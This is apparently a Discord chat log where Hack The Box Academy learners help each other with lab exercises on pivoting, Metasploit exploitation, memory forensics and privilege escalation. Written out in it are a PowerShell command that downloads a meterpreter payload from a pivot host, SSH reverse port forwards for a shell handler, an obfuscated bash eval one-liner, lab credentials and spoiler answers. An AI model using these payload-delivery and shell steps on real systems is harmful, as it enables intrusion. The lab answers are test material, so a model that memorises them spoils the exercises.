What I did was ||dump the memory of the pid with volatility windows.memmap.Memmap --pid 6744 --dump and then "manually" use a texteditor to find interesting strings. Sadly no good texteditor was available on the VM and also no strings.exe, so I had to use notepad shudder. I had to search/replace all spaces with nothing, because some of the code was being displayed as N a m e = f i e l d (I assume due to textencoding) so a normal search wouldn't find it. Afterwards looking for the most popular Powersploit script names with ctrl +f found like 4 results in one block that I could crosscheck with github and see that it indeed came from this specific Powersploit file. It was a code block near the beginning of the script that set up some structs/enums. Other parts of the script were not included, really just that one block. There are a bunch of other powershell related code snippets and file names (some sounding really juicy like "disable-defender.ps1"), but those are all just noise and to be ignored. I'm not sure if I had found this without already knowing what I'm looking for||

Have you attempted to search the Discord for your question? I haven't done this module or I would attempt to help. Also I think it is on the newer side so sometimes you gotta ask at different times until someone who has done it can help. HOpe this helps

got some strange behaviour from bashfuscator if I run the generated payload on the pwnbox bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"' it works fine but if I run on my Kali or base linux install I get this error bash: line 1: p/e: No such file or directory

I have switched out to a basic shell incase zsh etc was interfering in some way

@brisk socket Did you get your question solved on that PW attacks module? For some reason I'm unable to respond to the question in the community help section.

||If you haven't already.... Make sure you find the password.bak and shadow.bak in the .backups directory||.

Anyone?? 🥲 😂

Copy and paste that question in the search. I believe one user posted something about it. I think he got the answer but wanted help understanding. Maybe reach out to him?

search explotexploit

I really can’t understand this module: https://academy.hackthebox.com/module/177/section/1764. Why does the database name come out different every time I use the code? Even the flag name is different. It’s me. Is it a problem? I completely use the code provided by HTB.

Pivoting,tunneling and port forwarding.
**What IP address is used on the attack host to ensure the handler is listening on all IP addresses assigned to the host? (Format: x.x.x.x) **

So I basically completed all the steps until the powershell invoke web request. I ain't got the slightest idea: How do I access powershell?
Do I have to RDP in some sort of way? Everything else is set up, just that part bugs me a little bit.

I have a reverse shell but couldnt figure out the command to preview the file that is shared from root with a user, any help would be appreciated

I'm having the same issue... I've already reset the machine a couple of times, tried terminating a couple of times, waiting in between tries... it seems that this machine is unnecessarily slow to start services and buggy. I managed to get an anonymous login in the end, but after like 15 tries and an hour of resetting.

You created the payload right?

Yup.

InternalIPOfPivotHost is 172.16.5.129, right?

I should not be mistaken.

That is the listening IP of the payload

What did you use for your msconsole settings?

Same payload windows, x64,https, and basically 1:1 with the example.

Now I ain't sure if it's about the ports.

There is smth going over my head.

InternalIPofpivot host nope, not sure

How did you get that address?

lhost sould be 0.0.0.0

port 8000

Then transfer your payload to the pivot host with scp

ssh, ifconfig

Yup.

Done that.

pivot IP is this @10.129.202.64

Duh?

Well. it could be different depending on the machine

Isn't that external?

any hints on this im also stuck?

So that's what I should be using on my payload?

That's the ip you upload the payload too

That’s external, your internal is a wrong one…

Did you start a SSH reverse port forward?

No use if I had mistaken that IP at first.

But yeah, I did.

Then iniate the local port forward?

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

Oh sorry my bad, I thought you were doing the skill assessment

Why would I?

Then RDP

xfreerdp /v:127.0.0.1 /u:victor /p:p

Use the correct pass

Woah, there's no RDP?

Do I even have to do it?

Are we on the same page.

I ain't talking about the 3rd section.

https://academy.hackthebox.com/module/158/section/427

I am talking about Remote/Reverse Port forwarding with SSH.

The answer to the second question in the module.

Goooood morning folks!

Look through what i sent

I have the dumb question for the day!

Will do, ser. I just wanna get that shell, so I know I have done it,

Thank You in advance,

When using msfconsole on machines, am I setting the lhost (my machine) to the default ip address or the tun0 ip address?

You asked if you RDP? I was getting to it. Yes you RDP

I sit the same creds as before?

Is it*

Should be, Ima look through it.

Once you upload the payload to the pivot host. You start a python server, then use invoke to download it to the target.

tun0 since you’re connected to that machine/network via a vpn.

I believe thats why you RDP in. SO that you can do that.

I thought so, thank you!

I think then my only other issue is the targeturi

What are the parameters you set in msf?

Also which module /section?

Working the getsimple box on the getting started module. I enumeratued and found the admin page. guessed the password first time (admin) and found the file upload section. checked msfconsole and they have an exploit for that page. set the lhost, the rhost, the username and password, and changed the target uri to /admin/upload.php

msf console spits back this:

[*] Started reverse TCP handler on 10.10.14.71:4444
Authenticating...

• The authentication process is done successfully!
• Extracting Cookies Information...
• Exploit aborted due to failure: no-access: 10.129.112.222:80 - Authentication failed
  [*] Exploit completed, but no session was created.

This is the only targeturi that gets as far as successful authentication

when posting codes / cmd line outputs, you can wrap them w/ 2 single backticks ` or eg like this this is code

Thank you

the path to the /targeturi is very crucial. use / as the path.

yeah I've set it to /admin/upload.php

no just set it to /

Oh wow, really?

So that did the same, exploit failed

I might have to do some more digging

the admin page URL was located at /admin.page, setting the targeturi to / would indicate the root path for the target (getsimple blog)

Aaah of course

make sure you are using the right msf module for getsimple, you need to properly set the rhost, targeturi (as /) and lhost and you are good to go.

I'm fairly confident

I keep getting as far as upload payload

But then it fails

I think there are two modules for getsimple iirc. Try the parameters on both. If it doesn’t work recheck your rhost/lhost, ping your target to make you sure it is still active.. and last resort reset the target.

Okay!

I'll try the other one then

Fml it worked. The worst part was it didn't even ask for a password

Because it’s an unauthenticated RCE vuln.

https://tenor.com/view/learning-learnding-funny-the-simpsons-dumb-gif-5270072

So I gotta RDP in via proxychains?

Which means that i have to refer back to local port forwarding?

Problem being there's no 3389 port open.

Kinda left out w/ 20 and 80.

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64

ssh -L 3389:172.16.5.19:3389 ubuntu@10.129.202.64

Then RDP. no proxy

So I gotta do a local anyway.

Lemme try these.

I've got about 30 mins before i go to work. SO hurry if you can or i won't be able to help

So I did that.

And as per usual it opened up ssh.

Next stupid question: I've used curl to download LinEnum.sh from my machine and the shell inside meterpreter decided to just have the script written out rather than as a .sh file?

How am I supposed to xfreerdp.

use 127.

So from my own terminal to use local ip?

yes

thats crazy

You really should revisit the section and module as a whole.

that's how curl works you need to have an output for it

Yeah, everything's just confusing as hell.

Damn, okay thank you! And also just thank you for putting up with silly questions in general

That’s fine
I would suggest you learn ligolo ng after, it’s gonna help you a ton.

lol, I seem to have found a small error in the HTB module: https://academy.hackthebox.com/module/177/section/1765. After coding correctly, the textbook gives =0, which is the result of the screenshot. It is available, and =1 is the token. If what you pointed out is correct, I hope the official can make a correction. If it is wrong, I will feel sorry for it.

The module is def confusing

I am like, stuck on that. It's just melting my brain.

• RDP worked, Lemme download the stuff rn.

Did the rdp work?

post in #858470491676737536;
include: what's incorrect, what needs to be fixed

SHould use invoke to download payload to the windows machine.

It was alright. I would avoid socksoverrdp for double pivot due to latency issues

start a python server on web01

ok,when I have free time I will post

Yup.

ligolo-ng will be a godsend

Initiate the payload once its transferred and you should get a shell in meterpreter

I didn't know I had to refer myself to the old section.

Is there any indian kid that can explain port forwarding and tunneling.

On YT.

Theres a white kid

a lot of modules refer back to each other the deeper you go in the path lol

or at least concepts you should know

For real ^. After the skills assessment, I wondered how one’s life would be miserable using chisel and proxychains.

does anyone know if connection problems have been solved ? like the not being able to spawn targets or to reach them ?

https://www.youtube.com/watch?v=mZqNP2fOLlk

you can double-pivot with it to

You mean with chisel / ligolo?

with ligolo

i heavily prefer ligolo over chisel

Oh yeah,

no

it's not permanently down

ok i am confused

message support

Switch your vpn server

Oh no, nvm

@fathom pendant you seem to know a lot, do you happen to know an ETA for the connection problems ?

no idea

i'm not staff or anythign

i just repeat what i've seen staff explicitly state

ah ok

Did you get it?

nuh, now the pwoershell cant reach the server

ima get it dw

||Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\Users\victor\Desktop\backupscript.exe"||

Good luck im out

Holy sh, it worked

Did you get the shell in meterpreter?

YEEEEEEEES

OH MY GOD

FINALLY

I saw an online article that states adding .rb files in /home/kali/.ms4/modules/webshells/50064.rb to add this exploit in Metasploit. I ran updatedb as well. Unfortunately, this does not work. How can I add a module?

it's already there

also it'll be on the jump host in shells&payloads

not on your machine

Got the shell, now the question is: What IP address is used on the attack host to ensure the handler is listening on all IP addresses assigned to the host? (Format: x.x.x.x)

Follow me through, do I have to netstat on the shell session that I got?

... bruh

cp

Huh?

or you can use multi handler

multi handler with a custom payload

It's not in metasploit. I already checked.

it was weird, after adding it and doing updatedb it didn't show in search or autocomplete, but I could still do "use /path/to/file" in metasploit and it would work

yes, it is, and you can just use it

you don't even need the path

locate 50064.rb

locate might not show it because .ms4 is a hidden directory

I am fr, kinda lost here.

but I can assure you: it's there

what do you see when, for example, you do
python3 -m http.server 8080

that should be enough of a hint

yes

U mean that

Want to make one who going/will go through this section.

I faced a strange problem.
Fix is: gdb-peda$ run multiple times. Then only the exact location will appear, otherwise it doesn't

Then
disas main from gdb-peda

Then only answer will appear.

so just take out the port

That's a joke

What the f

it's not

I tried doing the same. This does not work either.

0.0.0.0 is a wildcard meaning all interfaces

:P it's basics

because it might not be in /modules/webapps

use just 50064.rb

Your explanations are very vague. You can clearly see in the screenshot that it's there.

As you can see, I left the basics and jumped out of a plane with a deep dive suit

also ms4 paths are different

they go from the .ms4 root

so it'd be like
use modules/webapps/50064.rb

Yes, that's correct.

I tried it just few seconds before you replied and it worked.

not the whole linux path

It had to be a relative path.

anyone else having issues using xfreerdp?

it takes a while than i get this:

[08:21:33:368] [3797:3798] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[08:21:33:369] [3797:3798] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[08:21:43:146] [3797:3798] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[08:21:43:148] [3797:3797] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

i can ping the machine tho

i can use evil-winrm to connect as wel

tbf even changin directory has a hold of at least 10 seconds

I told you that the answer was already in what I sent you. There’s was like 3 options to choose from. lol

Winrm doesn’t mean you can rdp though

RDP to 10.129.147.224 with user "htb-student" and password "Academy_student_AD!"

the task is to rdp

It says certificate verification failed, perhaps an /ignore-cert ?

Wait other way around, /cert-ignore

Or was it /cert:ignore

[08:36:34:446] [11318:11319] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[08:36:34:447] [11318:11318] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

Who knows

damn

What command are you using?

xfreerdp /v:10.129.147.224 /u:htb-student /p:'Academy_student_AD!' /cert-ignore

looks like the target didn't spawn correctly or something, did you try resetting?

yup

had this issue since last night as well

might need to contact support on this one

¨fixed it by switching vpn and hard reseting everything

https://forum.hackthebox.com/t/intro-to-windows-command-line-skill-assessment-question/273027
Hello, I have the same problem describe on the post on the module "Introduction to Windows Command Line", I wonder if anyone now how it have been fix ?
I try different version of the last answer as the password for user5 and I check that my clipboard paste it correctly but I can't ssh on the machine 🙃

Same here.

You can either create a new tun interface or close and start a new tunnel session

It should just be the answer to the previous question, no modifications

Yeah I know and I tried it several times but it didn't accept it

wtf.

└──╼ #sudo ./agent -connect 10.10.x.x:11601
sudo: ./agent: command not found
┌─[✗]─[root@par01]─[~]
└──╼ #ls
agent  Desktop  go  Templates

Use single quotes?

have anyone dealt with this before?

either i dont have permission or it doesnt find the file. Even tho i am root and in the same directory

sorry, I was dm-ing someone.

Have you tried: chmod +x

yup

it stil gives me permission denied

Weird

same result with the single quote

oh

i think i realized my extreamly stupid mistake. The keyboar layout set a - instead of a + for me @fathom pendant

Hi, I still didn't solve it. The point is, I can't even get to ssh into the target, because I'm not finding the password to ssh. I tried with the password resources provided on the module but it's not working for me. even after mutating it. So I'm not sure what else I can do to find the password of the user Will.

... you use the password from the previous section for "will" you're looking for the password for 'root'

One of my main weaknesses is adjusting web requests in burp to get information disclosure or RCE. Does anyone here know which module would help with that issue?

In password, shadow, & opasswd

Do you think it's an issue that I should ask the support about ? I found it weird that I have found a post about it

Probably, but it should work

What's q5

How many users exist on this host? (Excluding the DefaultAccount and WDAGUtility)

Ah

I know I can find the answer to the next question quickly, the fact that I can't log really draw me back

Holy ***, you're right, for some reason I forgot that the previous section we found the password for will. thanks a lot lol. I knew it was something dumb I was getting wrong.

The password is the whole 'D...nest'

Yeah that the one I try has pasword for user 5

Make sure that the words are properly capitalized

Except the first one they are not capitalized right ?

"The" should be capitalized

D...i...T...nest

Looking at it rn

what the

the q4 accept it without it

i'm really sorry it works now, thank you

The answer that you found for q4 was capitalized btw, this is why you copy/paste

Well user4* user4 is q5 since it starts with user0

Hello, i practice on htb academy for a month now and i have a question about the skill assessment of Hacking WordPress course. I've already entered the command: sudo sh -c echo '"IP inlanefreight.com" >> /etc/hosts"' and sudo sh -c echo '"IP blog.inlanefreight.com" >> /etc/hosts' And when I go to the first questions with the wpscan, etc. I have a response where there is no WordPress service. So if somebody has a hint, i'll be happy. Thanks

Trying to spawn targets has been a pain lately

anyone that could help me with issue. Its probably a issue related to my compiler but i have a GLIBC issue after compiling, because i get like:

./agent: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./agent)
./agent: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./agent)

When trying to run my ligolo-ng on my target machine

Just download the precompiled binaries

The author has them all available

oh shit. I couldnt find them

They're linked on the gh page

Anyone have hints for NoSQLi Skills assessment 2? I've located 3 endpoints ||/login /forgot and /reset|| and one valid user ||bmdyy|| I have tried SSJI, json, normal nosql payloads for all fields and I just cant make anything to work. It would be nice if I can get some direction where I should be looking for.

@snow ridge can dm

sure

can someone explain what I am doing wrong in windows Priv esc - DnsAdmins. I have confirmed that I am an Administrator but when I run the command to confirm the registry key was added I am getting "Access is denied" Now it wont even spawn the target so I give up for today.

In Intro to Web Applications, there's a question I'm confused by. https://academy.hackthebox.com/module/75/section/756

It says "Check the above login form for exposed passwords. Submit the password as the answer."

Are they referring to the image of the login that is on the page I have linked here?? Or am I supposed to spin up the target and connect to it? And if so, after I do that, where do I find this login screen that is being referenced?" 🙁

I've tried "test" because the lesson what's on that page seems to indicate that the exposed password is "test" for the user "test", but that doesn't work, so I'm feeling like I've misunderstood something.